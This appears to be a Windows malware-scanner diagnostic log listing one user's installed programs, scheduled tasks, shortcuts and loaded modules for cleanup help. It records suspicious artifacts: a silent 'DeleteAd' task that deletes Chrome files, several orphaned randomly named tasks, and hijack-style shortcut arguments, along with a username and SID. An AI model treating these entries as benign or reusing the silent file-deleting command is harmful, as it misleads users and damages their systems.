Microsoft Windows SDK for Visual Studio 2008 Express Tools for Win32 (HKLM\...\{07FCBED5-94C3-4F94-B9D3-360FA27C7B06}) (Version: 6.1.5288.17011 - Microsoft Corporation)
Microsoft WSE 3.0 Runtime (HKLM\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
Microsoft XNA Framework Redistributable 3.1 (HKLM\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft (HKLM\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mobizen (HKLM\...\{BA0D3A44-BCEE-4C8B-BCD4-F7F1E64F41E3}) (Version: 2.16.0.1 - RSUPPORT)
Movie Maker (Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Mozilla Firefox 49.0.1 (x86 en-GB) (HKLM\...\Mozilla Firefox 49.0.1 (x86 en-GB)) (Version: 49.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 49.0.1.6109 - Mozilla)
MSBuild/NuGet Integration 14.0 (x86) (Version: 14.0.25123 - Microsoft Corporation) Hidden
Multi-Device Hybrid Apps using C# - Templates - ENU (Version: 14.0.23107 - Microsoft Corporation) Hidden
NCsoft Launcher (HKLM\...\{5F8E2CBB-949D-4175-AC98-5ADE7F6C9697}) (Version: 1.5.25.1 - NCsoft)
Nexon Game Manager (HKLM\...\{EA2DB6E0-72C5-4ef9-A3A0-E6705F4A6A9E}) (Version: - )
No-IP DUC (HKLM\...\NoIPDUC) (Version: 4.1.0 - Vitalwerks Internet Solutions LLC)
Notepad++ (HKLM\...\Notepad++) (Version: 6.9.2 - Notepad++ Team)
NVIDIA PhysX (HKLM\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
Open Broadcaster Software (HKLM\...\Open Broadcaster Software) (Version: - )
Open XML SDK 2.5 for Microsoft Office (Version: 2.5.5631 - Microsoft Corporation) Hidden
OpenAL (HKLM\...\OpenAL) (Version: - )
OpenTTD Package 0.7.5 (HKLM\...\OpenTTD Package) (Version: 0.7.5 - OpenTTD.org / Package: NHLfan (www.free-clan.org))
Origin (HKLM\...\Origin) (Version: 10.1.1.35466 - Electronic Arts, Inc.)
Overwolf (HKLM\...\Overwolf) (Version: 0.97.209.0 - Overwolf Ltd.)
Paladins (HKLM\...\Steam App 444090) (Version: - Hi-Rez Studios)
PCSX2 - Playstation 2 Emulator (HKLM\...\pcsx2-r5875) (Version: - )
PDF Settings CS4 (Version: 9.0 - Adobe Systems Incorporated) Hidden
Photoshop Camera Raw (Version: 5.0 - Adobe Systems Incorporated) Hidden
Pixel Bender Toolkit (Version: 1.0 - Adobe Systems Incorporated) Hidden
Pixelmon Launcher (HKLM\...\Pixelmon Launcher 1.1.31) (Version: 1.1.31 - Ikara Software Limited)
Pixelmon Launcher (Version: 1.1.31 - Ikara Software Limited) Hidden
PlanetSide 2 (HKLM\...\Steam App 218230) (Version: - Sony Online Entertainment)
PlanetSide 2 (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\SOE-PlanetSide 2 PSG) (Version: 1.0.3.183 - Sony Online Entertainment)
Pokémon Trading Card Game Online (HKLM\...\{E4F8D5D6-87DC-41CD-8FE1-09190034259F}) (Version: 2.27.0 - The Pokémon Company International)
Port Forward Network Utilities (HKLM\...\{88B1D36C-7B70-4C48-8D2F-AAB956ECF4C3}) (Version: 2.0.7 - Portforward, LLC)
PreEmptive Analytics Visual Studio Components (Version: 1.2.3197.1 - PreEmptive Solutions) Hidden
PreEmptive Analytics Visual Studio Components (Version: 1.2.5134.1 - PreEmptive Solutions) Hidden
Prerequisites for SSDT (HKLM\...\{35C1D9D6-87C0-46A3-B1B4-EDBCC063221C}) (Version: 11.1.3000.0 - Microsoft Corporation)
Project 64 version 2.1.0.1 (HKLM\...\Project 64_is1) (Version: 2.1.0.1 - )
Project64 1.6 (HKLM\...\{9559F7CA-5E34-4237-A2D9-D856464AD727}) (Version: 1.6 - Project64)
Python Tools Redirection Template (Version: 1.2 - Microsoft Corporation) Hidden
QuickSFV (HKLM\...\{DBDCD3AF-20E4-4E5E-80E8-B14109FE5DD9}) (Version: 3.0.0 - Totally Useful Software, Inc.)
Rayman Origins (HKLM\...\Uplay Install 80) (Version: - Ubisoft)
Rayman Raving Rabbids (HKLM\...\{111E336D-30BF-4CD4-8D69-4541732AFB27}) (Version: 1.00.0000 - Ubisoft)
Razer Cortex (HKLM\...\Razer Cortex_is1) (Version: 6.2.12.0 - Razer Inc.)
Realm of the Mad God (HKLM\...\Steam App 200210) (Version: - Wild Shadow Studios)
RealNetworks - Microsoft Visual C++ 2008 Runtime (Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden
RealUpgrade 1.1 (Version: 1.1.0 - RealNetworks, Inc.) Hidden
Robocraft version 0.3.290 (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\{9F101691-69D3-422E-BB5C-8CAD7110781B}_is1) (Version: 0.3.290 - Freejam)
Roslyn Language Services - x86 (Version: 14.0.23107 - Microsoft Corporation) Hidden
Roslyn Language Services - x86 (Version: 14.0.25130 - Microsoft Corporation) Hidden
RPG Maker MV (HKLM\...\RPGMV_is1) (Version: 1.0.0.0 - KADOKAWA)
RPG MAKER VX Ace RTP (HKLM\...\RPGVXAce_RTP_is1) (Version: 1.00 - Enterbrain)
Sandlot Games Client Services (HKLM\...\Sandlot Games Client Services_is1) (Version: - Sandlot Games)
Screen Capturer (HKLM\...\Screen Capturer) (Version: 1.0.4.42 - ScreenCapturer.com)
SDK de comprobación de Visual Studio 2012 - esn (Version: 12.0.30501 - Microsoft Corporation) Hidden
ShadowExplorer 0.9 (HKLM\...\ShadowExplorer_is1) (Version: 0.9.462.0 - ShadowExplorer.com)
SharePoint Client Components (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
SharePoint Client Components (Version: 16.0.2617.1200 - Microsoft Corporation) Hidden
Sid Meier's Civilization 5 (HKLM\...\Sid Meier's Civilization 5_R.G. Mechanics_is1) (Version: - R.G. Mechanics, Panky)
Simple Port Forwarding (HKLM\...\Simple Port Forwarding) (Version: 3.7.0 - PcWinTech.com)
Skype Click to Call (HKLM\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.3.0.9150 - Microsoft Corporation)
Skype™ 7.26 (HKLM\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.26.101 - Skype Technologies S.A.)
SlimDX Runtime .NET 2.0 (January 2012) (HKLM\...\{014A2868-BE56-4888-A16C-693989B8F153}) (Version: 2.0.13.43 - SlimDX Group)
Smooth Operators - Indie Gala Edition (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\6b0b0d2561055daf) (Version: 1.0.0.14 - Heydeck Games)
Sonic Foundry Vegas 4.0d (HKLM\...\{E254F7FF-1C85-47E1-96DB-1D9400C9F52A}) (Version: 4.0.205 - Sonic Foundry)
Sony Sound Forge 7.0 (HKLM\...\{0712667C-A171-49AE-A098-4ACDA28625F8}) (Version: 7.0.214 - Sony)
Spacewar (HKLM\...\Steam App 480) (Version: - Valve)
SpongeBob SquarePants - The Movie (HKLM\...\{B98D958E-9E59-43B7-B47F-043D45D73EE6}) (Version: 1.0 - )
SPORE™ (HKLM\...\{9DF0196F-B6B8-4C3A-8790-DE42AA530101}) (Version: 1.00.0000 - Electronic Arts)
Steam (HKLM\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Stellaris version 1.0.0 (HKLM\...\Stellaris_is1) (Version: 1.0.0 - RezMar)
Stronghold Kingdoms (HKLM\...\Steam App 47410) (Version: - FireFly Studios)
Suite Shared Configuration CS4 (Version: 1.0 - Adobe Systems Incorporated) Hidden
SumatraPDF (HKLM\...\SumatraPDF) (Version: 2.1.1 - Krzysztof Kowalczyk)
swMSM (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
System Requirements Lab (HKLM\...\{A92D0DBB-834A-4CAD-A434-F2232C692516}) (Version: 6.1.4.0 - Husdawg, LLC)
System Requirements Lab Detection (HKLM\...\{D70E0C9A-2E2A-4022-93FD-7CE96E320658}) (Version: 6.1.6.0 - Husdawg, LLC)
Team Explorer for Microsoft Visual Studio 2013 (Version: 12.0.21005 - Microsoft Corporation) Hidden
Team Explorer for Microsoft Visual Studio 2015 Update 2 (Version: 14.95.25118 - Microsoft) Hidden
Team Fortress 2 (HKLM\...\Steam App 440) (Version: - Valve)
TeamViewer 11 (HKLM\...\TeamViewer) (Version: 11.0.53254 - TeamViewer)
Telenor Internet (HKLM\...\Telenor Internet) (Version: 21.005.15.02.208 - Huawei Technologies Co.,Ltd)
Test Tools for Microsoft Visual Studio 2015 (Version: 14.0.23107 - Microsoft Corporation) Hidden
The Hardy Boys - The Hidden Theft (HKLM\...\{DECE873A-A14E-4EE1-9E28-5171B44DE80D}) (Version: 1.00.0000 - JoWooD)
The Sims 4 (HKLM\...\{48EBEBBF-B9F8-4520-A3CF-89A730721917}) (Version: 1.0.797.20 - Electronic Arts)
The Sims™ 3 (HKLM\...\{C05D8CDB-417D-4335-A38C-A0659EDFD6B8}) (Version: 1.50.56 - Electronic Arts)
Thea - The Awakening (HKLM\...\1452699415_is1) (Version: 2.12.0.14 - GOG.com)
Trend Micro™ Titanium™ Internet Security (Version: 3.00 - Trend Micro Inc.) Hidden
TSR Workshop (HKLM\...\{CE4D2306-E8FF-4094-861B-D43DFCCC537C}) (Version: 2.0.195 - The Sims Resource)
TuneUp Utilities 2013 (Version: 13.0.3000.138 - TuneUp Software) Hidden
TuneUp Utilities Language Pack (en-US) (Version: 13.0.3000.138 - TuneUp Software) Hidden
TunnelBear (HKLM\...\{90e7dc26-e7df-406b-af23-61df6728a9f6}) (Version: 2.3.25.0 - TunnelBear)
TunnelBear (Version: 2.3.25.0 - TunnelBear) Hidden
TypeScript Power Tool (Version: 1.0.3.1 - Microsoft Corporation) Hidden
TypeScript Power Tool (Version: 1.8.9.0 - Microsoft Corporation) Hidden
TypeScript Tools for Microsoft Visual Studio 2013 (Version: 1.0.3.1 - Microsoft Corporation) Hidden
TypeScript Tools for Microsoft Visual Studio 2015 (Version: 1.8.31.0 - Microsoft Corporation) Hidden
Ubisoft Game Launcher (HKLM\...\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
UltraISO Premium V9.52 (HKLM\...\UltraISO_is1) (Version: - )
UnHackMe 7.80 (HKLM\...\UnHackMe_is1) (Version: - Greatis Software, LLC.)
Unity (32-bit) (HKLM\...\Unity (32-bit)) (Version: 5.4.2f1 - Unity Technologies ApS)
Unity Web Player (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\UnityWebPlayer) (Version: 5.3.6f1 - Unity Technologies ApS)
Update for (KB2504637) (HKLM\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Uplay (HKLM\...\Uplay) (Version: 22.2 - Ubisoft)
VC Runtimes MSI (Version: 9.0.21022 - Microsoft) Hidden
Visual Studio 2013 Update 3 (KB2829760) (HKLM\...\{86438e3d-7f83-4dd2-94aa-047e7c3974cb}) (Version: 12.0.30723 - Microsoft Corporation)
Visual Studio 2015 Update 2 (KB3022398) (HKLM\...\{78c1b501-a6eb-4f29-88c5-84189564827e}) (Version: 14.0.25123 - Microsoft Corporation)
VS Update core components (Version: 12.0.30723 - Microsoft Corporation) Hidden
VS Update core components (Version: 14.0.25123 - Microsoft Corporation) Hidden
vs_update2notification (Version: 14.0.25130 - Microsoft Corporation) Hidden
WCF Data Services 5.6.0 Runtime (Version: 5.6.61587.0 - Microsoft Corporation) Hidden
WCF Data Services 5.6.4 Runtime (Version: 5.6.62175.4 - Microsoft Corporation) Hidden
WCF Data Services Tools for Microsoft Visual Studio 2013 (Version: 5.6.61587.0 - Microsoft Corporation) Hidden
WCF Data Services Tools for Microsoft Visual Studio 2015 (Version: 5.6.62175.4 - Microsoft Corporation) Hidden
Winamp (HKLM\...\Winamp) (Version: 5.63 - Nullsoft, Inc)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 16.4.3503.0728 - Microsoft Corporation)
WinRAR 5.00 beta 4 (32-bit) (HKLM\...\WinRAR archiver) (Version: 5.00.4 - win.rar GmbH)
Workflow Manager Client 1.0 (Version: 2.0.40131.0 - Microsoft Corporation) Hidden
Workflow Manager Tools 1.0 for Visual Studio (Version: 2.0.40326.0 - Microsoft Corporation) Hidden
Worms Reloaded (HKLM\...\Steam App 22600) (Version: - Team17 Digital Ltd)
Worms Ultimate Mayhem (HKLM\...\Steam App 70600) (Version: - Team17 Software Ltd.)
XSplit Broadcaster (HKLM\...\{7BC30FB1-9AA6-4B0C-8E5A-574EA5B6CB2F}) (Version: 2.3.1505.0542 - SplitmediaLabs)
YGOPro Salvation Server Launcher (HKLM\...\{8C20F941-E756-4F78-ABC5-FE001F92716E}) (Version: 4.0.1 - Salvation Development)
Пакет Visual Studio 2012 Verification SDK - rus (Version: 12.0.30501 - Microsoft Corporation) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3268508096-794200350-1188608446-1000_Classes\CLSID\{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}\InprocServer32 -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll ()
CustomCLSID: HKU\S-1-5-21-3268508096-794200350-1188608446-1000_Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\InprocServer32 -> C:\Users\violeta\AppData\LocalLow\Unity\WebPlayer\loader\UnityWebPluginAX.ocx (Unity Technologies ApS)
CustomCLSID: HKU\S-1-5-21-3268508096-794200350-1188608446-1000_Classes\CLSID\{b226c901-b163-53c9-a14c-5b55ebb03907}\InprocServer32 -> C:\ProgramData\HappyCloud\Application\npHappyCloudPlugin.dll (The Happy Cloud)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {01835097-7B05-4094-B39B-A6F6BF09B715} - \AdobeFlashPlayerUpdate 2 -> No File <==== ATTENTION
Task: {05117A57-15BB-4310-AB94-ABEB78135006} - \{CFFDB85C-56BE-4D73-B744-97DB7D610B8E} -> No File <==== ATTENTION
Task: {0906990C-C047-4C7D-8D22-5255F1024FB3} - \{1E9494FA-6CA3-400B-B661-31837511C7EE} -> No File <==== ATTENTION
Task: {12E6E6BA-1D5A-41E4-A511-53A2E46B0B1E} - System32\Tasks\{5C207EF9-CA08-43D4-91CA-6C590E7657FE} => pcalua.exe -a C:\ProgramData\DeleteAd\DeleteAd.exe -c /progname=DeleteAd /progver=3.4.2 /progpub=DeleteAd /proguninstallurl=asdahjka.com /deleteappfolder=0 /deletefile2="C:\Program Files\Google\Chrome\Applicationupdate.dll" /deletefile3="C:\Program Files\Google\Chrome\Applicationchrome.dll" /VERYSILENT
Task: {1C7306D1-9834-4D43-A2C5-FEFAE0216B5D} - \{3E27A315-206F-40D5-88C8-C29D09D3BAEB} -> No File <==== ATTENTION
Task: {1E231D30-8087-4CA8-A2E0-4991D889B0B7} - System32\Tasks\{311AF327-B021-4024-948B-E4C0A9BE3ED5} => pcalua.exe -a "C:\Users\violeta\Desktop\starcarft\starcraft (1)\SETUP.EXE" -d "C:\Users\violeta\Desktop\starcarft\starcraft (1)"
Task: {258FDF9B-E6BF-4C1D-85FE-93C16438F4BE} - \RealPlayerRealUpgradeScheduledTaskS-1-5-21-3268508096-794200350-1188608446-1000 -> No File <==== ATTENTION
Task: {334E8B80-9763-434E-8437-770A5DC4A520} - \20sve2tm -> No File <==== ATTENTION
Task: {39B9DF0B-CC67-48F1-A4C1-2BADF10A3AC3} - \{33C192B0-0851-4C18-BB29-6CDD784756BE} -> No File <==== ATTENTION
Task: {3EB34F2D-8179-40B2-987A-C020312F5662} - System32\Tasks\{8E9137FE-8684-4D49-9056-080A156320CF} => pcalua.exe -a F:\setup.exe -d F:\
Task: {4D36E943-5B4B-417D-866E-E3F85BD73E06} - \TuneUpUtilities_Task_BkGndMaintenance2013 -> No File <==== ATTENTION
Task: {4E51ADA1-FD27-4C6B-942D-6D9876DAF0E8} - System32\Tasks\{7858AE6F-2D35-465B-A63B-4506E525E895} => pcalua.exe -a C:\Users\violeta\Desktop\Terramining_Launcher_v5.0.exe -d C:\Users\violeta\Desktop
Task: {4E8A2AB5-82D2-4748-9188-0E52B2B4F655} - \RsDelayLauncher_{8A34248E-7D35-4832-8378-7659E0B0A380} -> No File <==== ATTENTION
Task: {4F4C7C4A-4737-4F99-AF72-85BE3C1F13A4} - \{F0E4F20A-26C0-4803-85F3-DE100A506A22} -> No File <==== ATTENTION
Task: {554B3DC5-F1D5-4865-99F3-D4C4EB99F1CF} - System32\Tasks\{D4AE419A-9B8B-450D-AE59-1C8CC97DE39E} => pcalua.exe -a "C:\Users\violeta\Desktop\CS 1.6\CS 1.6.exe" -d "C:\Users\violeta\Desktop\CS 1.6"
Task: {5E4FD528-665B-4BC7-92C3-FC3316142788} - \{CF0DA0CD-2FF5-454E-A86C-8C36A48353BC} -> No File <==== ATTENTION
Task: {681961EB-98DB-4520-A892-699E4B818385} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-04-01] (Google Inc.)
Task: {694BC2C8-C491-43DE-BBE5-75891AEE91CB} - \{0EC195FB-14E3-4A02-B5E5-AAFFE238361D} -> No File <==== ATTENTION
Task: {7142AD74-C29A-4BB5-A27D-91D0FBBB51B6} - System32\Tasks\{A38E8D68-7584-4A0F-940E-1FE37F379412} => pcalua.exe -a "C:\Users\violeta\Documents\Adobe CS4\Microsoft Office 2007 SP2\setup.exe" -d "C:\Users\violeta\Documents\Adobe CS4\Microsoft Office 2007 SP2"
Task: {72ACF684-33A4-45E8-ACB2-EAF73F1A890E} - \{7BF7CA1C-3C80-4A51-B3A7-61A431253F64} -> No File <==== ATTENTION
Task: {74889F7C-185A-465F-8C1C-567D2DCC89F3} - \pimofki -> No File <==== ATTENTION
Task: {7A50F39A-32C9-40E7-886D-6342E45BB001} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-04-01] (Google Inc.)
Task: {7BD59BB0-7AB6-4C3F-86F5-EA01AB5F3279} - \fuwykpyf -> No File <==== ATTENTION
Task: {8166E3F4-7EC4-491B-A85A-46583DA99AFF} - System32\Tasks\{BFB9C547-7098-46A8-8E8F-9910DA232F47} => pcalua.exe -a E:\setup.exe -d E:\
Task: {832ED96F-EC20-4772-BA80-943E8A40FCEE} - System32\Tasks\Overwolf Updater Task => C:\Program Files\Overwolf\OverwolfUpdater.exe [2016-08-29] (Overwolf LTD)
Task: {83E5CED8-349E-4DE8-9520-04CAF5F20EEC} - System32\Tasks\{B09A2006-EB16-4965-88E7-1DEBF6F20697} => pcalua.exe -a D:\Setup.exe -d D:\
Task: {92FDFE4C-B839-4B9D-901E-E6033735687A} - System32\Tasks\{2E2E9404-8E8E-461C-BE14-AA355E9F486D} => C:\Program Files\Steam\Steam.exe [2016-10-13] (Valve Corporation)
Task: {949BC973-1ECE-428A-AA5E-41334017F8FD} - System32\Tasks\{C457118D-ABD5-4247-AAC2-C7F544A687A7} => pcalua.exe -a "C:\Users\violeta\Documents\Microsoft Office 2007 SP2\setup.exe" -d "C:\Users\violeta\Documents\Microsoft Office 2007 SP2"
Task: {9810F01D-F471-42A3-B856-C40FC59F9803} - \{8F1539C2-BC2A-4974-A0CC-92330EC7F6BF} -> No File <==== ATTENTION
Task: {9CBF7DD8-1CE8-4DCB-B923-DAF4E4701D7D} - \{6DE94743-B83B-4B6B-90D4-3221A25A338C} -> No File <==== ATTENTION
Task: {9F201C7A-576B-4D43-8D9F-A4B54293FCEF} - \{C5939251-AF8C-4222-AEE8-017F4EFC29BA} -> No File <==== ATTENTION
Task: {A39DDC62-CEEC-413F-BC16-C10C4D0E1286} - System32\Tasks\{59A7E9A3-F72E-4FDC-A8D6-02402773F974} => pcalua.exe -a "C:\Program Files\InstallShield Installation Information\{9DF0196F-B6B8-4C3A-8790-DE42AA530101}\SPORESetup.exe" -c -runfromtemp -l0x0009 -removeonly
Task: {A3EF7403-3EB3-4A5E-85B2-F1842BAF02CF} - System32\Tasks\{95502C7E-0E78-4F3A-BEC0-EDBFC19B41E9} => C:\Program Files\Codemasters\Worms 4 Mayhem\launcher.exe
Task: {A6EFF130-5382-4A63-A033-86FA1924A0FC} - System32\Tasks\{B262C212-FA9B-45C9-9574-A28A5B808AE3} => pcalua.exe -a C:\Users\violeta\AppData\Local\Temp\Shockwave_Installer_FF.exe -d "C:\Program Files\Mozilla Firefox" <==== ATTENTION
Task: {A91BEF5F-C911-48EB-8D41-FF9292D84650} - System32\Tasks\{F35EF9E7-3F1A-4BDE-97E4-74DD73E6BB2D} => pcalua.exe -a E:\Sims3Setup.exe -d E:\
Task: {AF04095F-DCCD-4778-8E44-F5EBFFD2B929} - \{F7D851AA-0D16-4E69-A250-0BBEFB60741F} -> No File <==== ATTENTION
Task: {B1200175-6D83-4B23-AC80-4688B50DFC6C} - System32\Tasks\Opera scheduled Autoupdate 1374300909 => C:\Program Files\Opera\launcher.exe
Task: {B392518B-C4FB-46AB-97B9-C782DF67F093} - \{F05E8383-6A0D-4EC7-8387-45219DAF74DC} -> No File <==== ATTENTION
Task: {B4849F2D-8897-4812-B999-D27BD4E24928} - \{0124643C-E010-44C2-9F26-76F3A357FEEC} -> No File <==== ATTENTION
Task: {B97BA05A-0C28-43A4-BEB8-4215C63E9B74} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-04-15] (Piriform Ltd)
Task: {C04DD09C-8E8F-4EFC-BA40-76E38C017EDF} - \{83496550-34D8-473D-9C5B-22447F85749B} -> No File <==== ATTENTION
Task: {C0E03518-0BD3-4FB9-BC6A-CEFB4366A54A} - System32\Tasks\{18CB3208-4D4D-42BB-BC6A-C70FF9FB57D7} => C:\Program Files\Steam\Steam.exe [2016-10-13] (Valve Corporation)
Task: {C47C9F45-028F-489C-8034-E39D23DEF266} - System32\Tasks\{04502F1C-86D9-4EA2-9C23-9BC3171C1BDD} => pcalua.exe -a C:\Users\violeta\Downloads\qsfv236.exe -d C:\Users\violeta\Downloads
Task: {C92C0B60-5D18-4764-96A6-F34DE2E15136} - \AdobeFlashPlayerUpdate -> No File <==== ATTENTION
Task: {D0EEEA40-7CEF-4D6D-A553-DE1D49CBB4B8} - \RealDownloaderDownloaderScheduledTaskS-1-5-21-3268508096-794200350-1188608446-1000 -> No File <==== ATTENTION
Task: {D97EE862-AE54-469B-BEE3-B49B10A1B715} - \{FCDC0ED4-0446-4695-8787-4841D69B92BC} -> No File <==== ATTENTION
Task: {DE7F472F-7147-4F3C-9A59-01F3BCF2BC5A} - System32\Tasks\Norton Security Scan for violeta => C:\PROGRA~1\NORTON~2\Engine\403~1.27\Nss.exe
Task: {E7ACA675-7025-4907-B741-CDA24CF6A000} - \{56AC13DC-CA7D-4BD2-B12C-8D196A5BA630} -> No File <==== ATTENTION
Task: {E9004173-DBF4-4037-95A5-4F3CEE5A74D8} - System32\Tasks\Microsoft\VisualStudio\VSIX Auto Update 14 => C:\Program Files\Microsoft Visual Studio 14.0\Common7\IDE\VSIXAutoUpdate.exe [2016-03-22] (Microsoft Corporation)
Task: {EDD3D664-5750-4AA8-A4A7-35D0AFA7F94B} - System32\Tasks\{A0C6A56F-E9DC-482E-B09F-7F8A4DD9123E} => pcalua.exe -a "H:\Microsoft Office 2007 SP2\setup.exe" -d "H:\Microsoft Office 2007 SP2"
Task: {EE29AE84-B65C-4094-A9DC-5619657B01F6} - System32\Tasks\{518DEA76-1413-4EAC-8A7E-EB8239A2CC26} => pcalua.exe -a C:\Users\violeta\Desktop\monaco\MonacoX_V101.exe -d C:\Users\violeta\Desktop\monaco
Task: {F170349C-A3EE-4B1E-B817-A0EB7254A9AA} - \RealPlayerRealUpgradeLogonTaskS-1-5-21-3268508096-794200350-1188608446-1000 -> No File <==== ATTENTION
Task: {F19D654B-7102-4AE6-A028-F1AA9A3DDD04} - System32\Tasks\{9501D8D4-7EA9-414E-9D63-51680C081EE2} => pcalua.exe -a C:\Windows\system32\PhysX.cpl
Task: {F39B86DA-11E0-462A-A409-27C135FB15F3} - System32\Tasks\{DE527422-51DA-4DDC-80B5-E26334C302C0} => pcalua.exe -a C:\Users\violeta\Downloads\ioquake3-q3a-1.32-1.x86.exe -d C:\Users\violeta\Downloads
Task: {F65802D2-02AC-45BA-8526-47BAA75872AB} - System32\Tasks\{27F1F02B-D602-4D33-9DC7-B44328FC20A0} => pcalua.exe -a "C:\Windows\Garrysmod - NOSTEAM - FuzeRip\uninstall.exe" -c "/U:C:\Program Files\GarrysMod\Uninstall\uninstall.xml"
Task: {F6DF3C1F-22F2-40DB-AA94-2B7F42C715F2} - System32\Tasks\{16675950-E014-4F0D-8D6B-180D571145FB} => pcalua.exe -a C:\Users\violeta\Desktop\Starcraft\Chaoslauncher.exe -d C:\Users\violeta\Desktop\Starcraft
Task: {FE5C0531-D94E-4827-9879-2EF8A4CF5047} - System32\Tasks\UnHackMe Task Scheduler => C:\Program Files\UnHackMe\hackmon.exe [2015-10-07] (Greatis Software)
Task: {FEF60921-2E0B-4B6F-8182-269FBE4F1E36} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2016-09-14] (Adobe Systems Incorporated)
Task: {FF8DA4BE-015F-43F0-92CE-F0CD9BF820F0} - \{74CF8BF1-6DC8-411D-BEAF-22DAA4FEDFAF} -> No File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Norton Security Scan for violeta.job => C:\PROGRA~1\NORTON~2\Engine\403~1.27\Nss.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Покретач Chrome апликација.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (No File) <===== Cyrillic
Shortcut: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Simple Port Forwarding\SPF - Basic UI Mode.lnk -> C:\Program Files\Simple Port Forwarding\basic_ui.bat ()
Shortcut: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Покретач Chrome апликација.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (No File) <===== Cyrillic
Shortcut: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GarrysMod\Start Garrysmod.lnk -> C:\Program Files\GarrysMod\Start.bat (No File)

ShortcutWithArgument: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\violeta\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\violeta\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF%
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF%
ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF%

==================== Loaded Modules (Whitelisted) ==============

2016-07-06 17:24 - 2012-08-31 15:01 - 00151552 _____ () C:\Windows\System32\HP1100LM.DLL
2016-07-06 17:26 - 2012-08-31 15:01 - 00069632 _____ () C:\Windows\system32\spool\PRTPROCS\W32X86\HP1100PP.DLL
2012-11-03 17:47 - 2012-11-03 17:47 - 00076888 _____ () C:\Windows\system32\PnkBstrA.exe
2015-08-15 00:33 - 2015-08-15 00:33 - 00188072 _____ () C:\Program Files\Razer\Razer Services\GSS\GameScannerService.exe
2013-10-30 11:53 - 2011-12-19 14:10 - 00246112 _____ () C:\ProgramData\Telenor Internet\OnlineUpdate\ouc.exe
2011-12-19 14:11 - 2011-12-19 14:10 - 00011362 _____ () C:\ProgramData\Telenor Internet\OnlineUpdate\mingwm10.dll
